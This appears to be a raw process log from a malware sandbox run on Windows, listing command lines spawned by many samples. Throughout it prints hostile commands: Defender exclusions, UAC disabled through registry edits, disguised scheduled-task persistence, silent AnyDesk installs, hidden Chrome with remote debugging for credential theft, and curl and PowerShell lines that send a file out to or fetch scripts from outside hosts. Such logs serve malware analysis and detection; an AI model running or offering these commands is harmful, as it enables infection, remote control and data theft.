C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E0D7.tmp\E0D8.tmp\E0D9.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe""
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2504,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gE7h5o8ADRYV.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe" && pause
C:\Users\Admin\Desktop\Files\pp.exe
"C:\Users\Admin\Desktop\Files\pp.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2332,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2328 /prefetch:2
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2368 /prefetch:3
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1876,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2592 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4532 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7444 -ip 7444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 1268
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\twztl.exe
"C:\Users\Admin\Desktop\Files\twztl.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\Files\pornhub_downloader.exe
"C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C2D.tmp\7C2E.tmp\7C2F.bat C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe"
C:\Users\Admin\Desktop\Files\PORNHU~1.EXE
"C:\Users\Admin\Desktop\Files\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8043.tmp\8044.tmp\8045.bat C:\Users\Admin\Desktop\Files\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ffcc21146f8,0x7ffcc2114708,0x7ffcc2114718
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\2568621829.exe
C:\Users\Admin\AppData\Local\Temp\2568621829.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\1487223240.exe
C:\Users\Admin\AppData\Local\Temp\1487223240.exe
C:\Users\Admin\AppData\Local\Temp\3020718451.exe
C:\Users\Admin\AppData\Local\Temp\3020718451.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\Files\frap.exe
"C:\Users\Admin\Desktop\Files\frap.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10332 -ip 10332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 768
C:\Users\Admin\Desktop\Files\newfile.exe
"C:\Users\Admin\Desktop\Files\newfile.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\202579613.exe
C:\Users\Admin\AppData\Local\Temp\202579613.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
